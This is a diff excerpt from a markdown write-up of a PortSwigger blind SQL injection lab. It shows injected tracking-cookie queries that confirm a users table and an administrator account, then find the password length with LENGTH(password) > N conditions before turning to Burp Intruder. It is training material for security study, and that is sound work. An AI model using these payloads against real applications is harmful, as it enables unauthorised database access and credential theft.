abdelazizSalah/Port_Swigger_Notes/SQL_Injection/Lab11-BlindSQLi/writeup.md

 6. Confirm that we have users table, if true, we will see welcome back message
    1. select tracking_id from tracking-table where tracking-id = '1234'' and (select 'x' from users LIMIT 1)='x' --
       1. what we are doing here now is that we are searching for user x, and limit it to one entry only to avoid crash, and check if x = x, if true this will show the welcome back message.
+      2. (select 'x' from users LIMIT 1) this will return to you the object that you selected, then you need to make it in for of boolean that is why we add ='x'
 7. Now, we know that table users exist in the database, now we should ensure that user 'administrator' exist in the users table
    1. select tracking_id from tracking-table where tracking-id = '1234'' and (select username from users where username ='administrator')='administrator' --
+   2. this should return true.
 8. Now we will try to bruteforce his password character by character
    1. First we need to determine the length of the password using the LENGH > X and we keep iterating until we get error, then we know the length
+      1. select tracking_id from tracking-table where tracking-id = '1234'' and (select username from users where username ='administrator' and LENGTH(password) > **1**)='administrator' --
-   2. select tracking_id from tracking-table where tracking-id = '1234'' and (select username from users where username ='administrator' and LENGTH(password) > **1**)='administrator' --
+      2. select tracking_id from tracking-table where tracking-id = '1234'' and (select username from users where username ='administrator' and LENGTH(password) > **2**)='administrator' --
+      3. select tracking_id from tracking-table where tracking-id = '1234'' and (select username from users where username ='administrator' and LENGTH(password) > **3**)='administrator' --
-   3. but instead of doing this manually, we can use the intruder, to brute force this.
+   2. but instead of doing this manually, we can use the intruder, to brute force this.
       1. go to the intruder
       2. select the location you want and mark it with sniper
          1. ![Sniper_Intruder](Sniper_Intruder.png)